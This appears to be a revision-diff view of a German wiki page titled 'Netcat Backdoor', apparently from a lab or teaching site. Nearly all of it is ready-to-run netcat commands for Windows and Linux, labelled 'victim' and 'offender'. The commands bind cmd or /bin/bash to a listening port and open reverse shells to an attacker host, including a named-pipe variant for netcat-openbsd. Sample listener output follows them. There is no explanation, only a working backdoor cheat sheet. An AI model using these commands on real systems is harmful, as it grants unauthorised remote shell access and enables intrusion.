Netcat Backdoor: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
Thomas (Diskussion | Beiträge) |
Thomas (Diskussion | Beiträge) |
||
| Zeile 16: | Zeile 16: | ||
*root@victim:~# nc.traditional -l -p 10001 -e /bin/bash | *root@victim:~# nc.traditional -l -p 10001 -e /bin/bash | ||
*root@offender:~# netcat 10.1.1.1 10001 | *root@offender:~# netcat 10.1.1.1 10001 | ||
| + | ==with netcat-traditional== | ||
| + | *root@offender:~# netcat -l -p 10002 | ||
| + | *root@victim:~# nc.traditional -c /bin/sh 10.1.1.2 10002 | ||
| + | |||
==with netcat-openbsd== | ==with netcat-openbsd== | ||
VICTIM=10.1.1.1 | VICTIM=10.1.1.1 | ||
Version vom 14. November 2017, 06:29 Uhr
Windows
Download
Victim
- C:\Users\admin\Downloads>nc -L -p 10011 -d -e cmd
Offender
MSVICTIM=10.1.1.4
- oesx:~ thomas$ nc $MSVICTIM 10011
Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. Alle Rechte vorbehalten. C:\Users\admin\Downloads>
Linux
with netcat-traditional
- root@victim:~# nc.traditional -l -p 10001 -e /bin/bash
- root@offender:~# netcat 10.1.1.1 10001
with netcat-traditional
- root@offender:~# netcat -l -p 10002
- root@victim:~# nc.traditional -c /bin/sh 10.1.1.2 10002
with netcat-openbsd
VICTIM=10.1.1.1 OFFENDER=10.1.1.2
- root@offender:~# nc -nvlp 8668
- root@victim:~# mknod /tmp/backpipe
- root@victim:~# /bin/sh 0</tmp/backpipe | nc $OFFENDER 8668 1>/tmp/backpipe
- root@offender:~# nc -nvlp 8668
listening on [any] 8668 ... connect to [10.1.1.2] from (UNKNOWN) [10.1.1.1] 54154